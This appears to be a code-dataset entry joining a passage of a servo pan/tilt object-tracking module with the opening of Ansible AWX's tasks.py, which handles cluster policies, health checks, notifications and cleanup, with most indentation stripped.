eh : the height of the object found by the Haar cascade.
"""
err_rate_pan = float(self.root_system.pan.current_dis_to_des(ex, ex + ew) / self.root_system.pan.get_previous_dis_to_des()) * 100
err_rate_tilt = float(self.root_system.tilt.current_dis_to_des(ey, ey + eh) / self.root_system.tilt.get_previous_dis_to_des()) * 100
self.decider.decision(self.current_target_obj_width, err_rate_pan, True)
self.decider.decision(self.current_target_obj_width, err_rate_tilt, True)
def __get_k_fact(self, obj_width):
"""Method to getting necessary k_fact by given object width.
Args:
obj_width (int): Width of the found object from haarcascade for measurement inferencing.
"""
return self.decider.decision(obj_width)
def get_physically_distance(self, obj_width):
"""Method to provide return the tracking object's physically distance value.
"""
return obj_width / self.current_k_fact # physically distance is equal to obj_width / k_fact.
class RegularLocker:
"""Class to define a basic object tracking method of the t_system's motion ability.
This class provides necessary initiations and a function named
:func:`t_system.motion.LockingSystem.RegularLocker.lock`
to provide movement of the servo motors while locking onto the target.
"""
def __init__(self, locking_system):
"""Initialization method of :class:`t_system.motion.LockingSystem.RegularLocker` class.
Args:
locking_system: The LockingSystem Object.
"""
self.root_system = locking_system
def lock(self, x, y, w, h):
"""Method for locking to the target in the frame.
Args:
x : the column number of the top-left point of the object found by the Haar cascade.
y : the row number of the top-left point of the object found by the Haar cascade.
w : the width of the object found by the Haar cascade.
h : the height of the object found by the Haar cascade.
"""
precision_ratio = 0.2
obj_middle_x = x + w / 2 # middle point's x axis coordinate of detected object
obj_middle_y = y + h / 2 # middle point's y axis coordinate of detected object
if obj_middle_x < self.root_system.frame_middle_x - self.root_system.frame_middle_x * precision_ratio:
self.root_system.pan.move(False, True) # second parameter: True rotates clockwise, False counterclockwise.
elif obj_middle_x > self.root_system.frame_middle_x + self.root_system.frame_middle_x * precision_ratio:
self.root_system.pan.move(False, False) # First parameter is the stop flag.
else:
self.root_system.pan.move(True, False)
if obj_middle_y < self.root_system.frame_middle_y - self.root_system.frame_middle_y * precision_ratio:
self.root_system.tilt.move(False, True) # second parameter: True rotates clockwise, False counterclockwise.
elif obj_middle_y > self.root_system.frame_middle_y + self.root_system.frame_middle_y * precision_ratio:
self.root_system.tilt.move(False, False) # First parameter is the stop flag.
else:
self.root_system.tilt.move(True, False)
@staticmethod
def get_physically_distance(obj_width):
"""Method to provide return the tracking object's physically distance value.
"""
kp = 28.5823 # gain rate with the width of object and physically distance.
return obj_width * kp # physically distance is equal to obj_width * kp in px unit. 1 px length is equal to 0.164 mm
class ArmExpansionLocker:
"""Class to define a locker as an extension of robotic arm of the t_system's motion ability. For focused non-moving point tracking or emotion showing.
This class provides necessary initiations and a function named
:func:`t_system.motion.LockingSystem.ArmExpansionLocker.lock`
to provide movement of the servo motors while locking onto the target.
"""
def __init__(self, locking_system):
"""Initialization method of :class:`t_system.motion.LockingSystem.ArmExpansionLocker` class.
Args:
locking_system: The LockingSystem Object.
"""
self.root_system = locking_system
if not arm.is_expanded():
self.root_system.stop()
self.root_system.gpio_cleanup()
def lock(self, x, y, w, h):
"""Method for locking to the target in the frame.
Args:
x : the column number of the top-left point of the object found by the Haar cascade.
y : the row number of the top-left point of the object found by the Haar cascade.
w : the width of the object found by the Haar cascade.
h : the height of the object found by the Haar cascade.
"""
pass
@staticmethod
def get_physically_distance(obj_width):
"""Method to provide return the tracking object's physically distance value.
"""
kp = 28.5823 # gain rate with the width of object and physically distance.
return obj_width * kp # physically distance is equal to obj_width * kp in px unit. 1 px length is equal to 0.164 mm
def scan(self, stop):
"""Method to scan around for detecting the object that will be locked before lock process.
Args:
stop: Stop flag of the tread about terminating it outside of the function's loop.
"""
self.scan_thread_stop = stop
threading.Thread(target=self.__scan).start()
def __scan(self):
"""Method to cycle collimator respectively clockwise and can't clockwise.
"""
precision_ratio = 0.95
while not self.scan_thread_stop:
while not self.tilt.current_angle >= self.tilt.max_angle * precision_ratio and not self.scan_thread_stop:
self.tilt.move(False, 5, 30)
while not self.pan.current_angle >= self.pan.max_angle * precision_ratio and not self.scan_thread_stop:
self.pan.move(False, 2, 30)
self.tilt.move(False, 5, 30)
while not self.pan.current_angle <= self.pan.min_angle / precision_ratio and not self.scan_thread_stop:
self.pan.move(True, 2, 30)
while not self.tilt.current_angle <= self.tilt.min_angle / precision_ratio and not self.scan_thread_stop:
self.tilt.move(True, 5, 30)
while not self.pan.current_angle >= self.pan.max_angle * precision_ratio and not self.scan_thread_stop:
self.pan.move(False, 2, 30)
self.tilt.move(True, 5, 30)
while not self.pan.current_angle <= self.pan.min_angle / precision_ratio and not self.scan_thread_stop:
self.pan.move(True, 2, 30)
self.scan_thread_stop = False
def stop(self):
"""Method to provide stop the GPIO.PWM services that are reserved for the locking system's servo motors.
"""
self.pan.stop()
self.tilt.stop()
def gpio_cleanup(self):
"""Method to provide clean the GPIO pins that are reserved for the locking system's servo motors
"""
self.pan.gpio_cleanup()
self.tilt.gpio_cleanup()
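# Illustrative sketch (not part of the original module): starting and stopping
# the scan loop. 'locking_system' is assumed to be an already constructed
# LockingSystem instance with working servo hardware.
def _example_scan_usage(locking_system):
    locking_system.scan(stop=False)  # launches __scan on a background thread
    # ... object detection runs elsewhere ...
    locking_system.scan_thread_stop = True  # asks the scan loop to exit
    locking_system.stop()  # release the PWM services when done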
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple, deque
import errno
import functools
import importlib
import json
import logging
import os
from io import StringIO
from contextlib import redirect_stdout
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
import ansible_runner.cleanup
# dateutil
from dateutil.parser import parse as parse_date
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV, MINIMAL_EVENTS, JOB_FOLDER_PREFIX
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils.common import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
create_partition,
)
from awx.main.utils.execution_environments import get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.utils.receptor import get_receptor_ctl, worker_info, get_conn_type, get_tls_client, worker_cleanup
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in a different format. \
'''
logger = logging.getLogger('awx.main.tasks')
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on logging settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.mark_offline(update_last_seen=True, errors=_('Instance received normal shutdown signal'))
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.node_type == exclude_type:
continue # never place execution instances in controlplane group or control instances in other groups
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
candidate_pool_ct = len([i for i in actual_instances if i.obj.node_type != exclude_type])
if not candidate_pool_ct:
continue
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.node_type == exclude_type:
continue
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / candidate_pool_ct >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
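# Illustrative sketch (not part of the original module): dispatching this task
# asynchronously with a list of positional arguments, mirroring the
# apply_async([...]) convention used elsewhere in this file. The notification
# ids and job id are assumptions for demonstration only.
def _example_queue_notifications(notification_ids, job_id):
    send_notifications.apply_async([notification_ids, job_id])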
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
def _cleanup_images_and_files(**kwargs):
if settings.IS_K8S:
return
this_inst = Instance.objects.me()
runner_cleanup_kwargs = this_inst.get_cleanup_task_kwargs(**kwargs)
stdout = ''
with StringIO() as buffer:
with redirect_stdout(buffer):
ansible_runner.cleanup.run_cleanup(runner_cleanup_kwargs)
stdout = buffer.getvalue()
if '(changed: True)' in stdout:
logger.info(f'Performed local cleanup with kwargs {kwargs}, output:\n{stdout}')
# only one designated instance (the last alphabetically by hostname) runs cleanup on execution nodes
checker_instance = Instance.objects.filter(node_type__in=['hybrid', 'control'], enabled=True, capacity__gt=0).order_by('-hostname').first()
if checker_instance and this_inst.hostname == checker_instance.hostname:
logger.info(f'Running execution node cleanup with kwargs {kwargs}')
for inst in Instance.objects.filter(node_type='execution', enabled=True, capacity__gt=0):
runner_cleanup_kwargs = inst.get_cleanup_task_kwargs(**kwargs)
try:
stdout = worker_cleanup(inst.hostname, runner_cleanup_kwargs)
if '(changed: True)' in stdout:
logger.info(f'Performed cleanup on execution node {inst.hostname} with output:\n{stdout}')
except RuntimeError:
logger.exception(f'Error running cleanup on execution node {inst.hostname}')
@task(queue='tower_broadcast_all')
def handle_removed_image(remove_images=None):
"""Special broadcast invocation of this method to handle case of deleted EE"""
_cleanup_images_and_files(remove_images=remove_images, file_pattern='')
@task(queue=get_local_queuename)
def cleanup_images_and_files():
_cleanup_images_and_files()
@task(queue=get_local_queuename)
def cluster_node_health_check(node):
'''
Used for the health check endpoint; refreshes the status of the instance, but must be run on the target node
'''
if node == '':
logger.warn('Local health check incorrectly called with blank string')
return
elif node != settings.CLUSTER_HOST_ID:
logger.warn(f'Local health check for {node} incorrectly sent to {settings.CLUSTER_HOST_ID}')
return
try:
this_inst = Instance.objects.me()
except Instance.DoesNotExist:
logger.warn(f'Instance record for {node} missing, could not check capacity.')
return
this_inst.local_health_check()
@task(queue=get_local_queuename)
def execution_node_health_check(node):
if node == '':
logger.warn('Remote health check incorrectly called with blank string')
return
try:
instance = Instance.objects.get(hostname=node)
except Instance.DoesNotExist:
logger.warn(f'Instance record for {node} missing, could not check capacity.')
return
if instance.node_type != 'execution':
raise RuntimeError(f'Execution node health check ran against {instance.node_type} node {instance.hostname}')
data = worker_info(node)
prior_capacity = instance.capacity
instance.save_health_data(
version='ansible-runner-' + data.get('runner_version', '???'),
cpu=data.get('cpu_count', 0),
memory=data.get('mem_in_bytes', 0),
uuid=data.get('uuid'),
errors='\n'.join(data.get('errors', [])),
)
if data['errors']:
formatted_error = "\n".join(data["errors"])
if prior_capacity:
logger.warn(f'Health check marking execution node {node} as lost, errors:\n{formatted_error}')
else:
logger.info(f'Failed to find capacity of new or lost execution node {node}, errors:\n{formatted_error}')
else:
logger.info('Set capacity of execution node {} to {}, worker info data:\n{}'.format(node, instance.capacity, json.dumps(data, indent=2)))
return data
def inspect_execution_nodes(instance_list):
with advisory_lock('inspect_execution_nodes_lock', wait=False):
node_lookup = {}
for inst in instance_list:
if inst.node_type == 'execution':
node_lookup[inst.hostname] = inst
ctl = get_receptor_ctl()
connections = ctl.simple_command('status')['Advertisements']
nowtime = now()
for ad in connections:
hostname = ad['NodeID']
commands = ad.get('WorkCommands') or []
worktypes = []
for c in commands:
worktypes.append(c["WorkType"])
if 'ansible-runner' not in worktypes:
continue
changed = False
if hostname in node_lookup:
instance = node_lookup[hostname]
elif settings.MESH_AUTODISCOVERY_ENABLED:
defaults = dict(enabled=False)
(changed, instance) = Instance.objects.register(hostname=hostname, node_type='execution', defaults=defaults)
logger.warn(f"Registered execution node '{hostname}' (marked disabled by default)")
else:
logger.warn(f"Unrecognized node on mesh advertising ansible-runner work type: {hostname}")
was_lost = instance.is_lost(ref_time=nowtime)
last_seen = parse_date(ad['Time'])
if instance.last_seen and instance.last_seen >= last_seen:
continue
instance.last_seen = last_seen
instance.save(update_fields=['last_seen'])
if changed:
execution_node_health_check.apply_async([hostname])
elif was_lost:
# if the instance *was* lost, but has appeared again,
# attempt to re-establish the initial capacity and version
# check
logger.warn(f'Execution node attempting to rejoin as instance {hostname}.')
execution_node_health_check.apply_async([hostname])
elif instance.capacity == 0:
# nodes with a proven connection that still need remediation run health checks at a reduced frequency
if not instance.last_health_check or (nowtime - instance.last_health_check).total_seconds() >= settings.EXECUTION_NODE_REMEDIATION_CHECKS:
# Periodically re-run the health check of errored nodes, in case someone fixed it
# TODO: perhaps decrease the frequency of these checks
logger.debug(f'Restarting health check for execution node {hostname} with known errors.')
execution_node_health_check.apply_async([hostname])
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
for inst in instance_list:
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
break
else:
(changed, this_inst) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower control node '{}'".format(this_inst.hostname))
inspect_execution_nodes(instance_list)
for inst in list(instance_list):
if inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.local_health_check()
if startup_event and this_inst.capacity != 0:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shut down services
for other_inst in instance_list:
if other_inst.version == "" or other_inst.version.startswith('ansible-runner') or other_inst.node_type == 'execution':
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisioning is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.mark_offline(errors=_('Another cluster node has determined this instance to be unresponsive'))
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.last_seen))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_receptor_workunit_reaper():
"""
When an AWX job is launched via receptor, files such as status, stdin, and stdout are created
in a specific receptor directory. This directory on disk is named with a random 8-character string, e.g. qLL2JFNT.
This is also called the work unit ID in receptor, and is used in various receptor commands,
e.g. "work results qLL2JFNT"
After an AWX job executes, the receptor work unit directory is cleaned up by
issuing the work release command. In some cases the release process might fail, or
if AWX crashes during a job's execution, the work release command is never issued to begin with.
As such, this periodic task will obtain a list of all receptor work units, and find which ones
belong to AWX jobs that are in a completed state (status is canceled, error, or succeeded).
This task will call "work release" on each of these work units to clean up the files on disk.
Note that when we call "work release" on a work unit that actually represents remote work
both the local and remote work units are cleaned up.
Since we are cleaning up jobs that the controller considers to be inactive, we take the added
precaution of calling "work cancel" in case the work unit is still active.
"""
if not settings.RECEPTOR_RELEASE_WORK:
return
logger.debug("Checking for unreleased receptor work units")
receptor_ctl = get_receptor_ctl()
receptor_work_list = receptor_ctl.simple_command("work list")
unit_ids = list(receptor_work_list)
jobs_with_unreleased_receptor_units = UnifiedJob.objects.filter(work_unit_id__in=unit_ids).exclude(status__in=ACTIVE_STATES)
for job in jobs_with_unreleased_receptor_units:
logger.debug(f"{job.log_format} is not active, reaping receptor work unit {job.work_unit_id}")
receptor_ctl.simple_command(f"work cancel {job.work_unit_id}")
receptor_ctl.simple_command(f"work release {job.work_unit_id}")
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
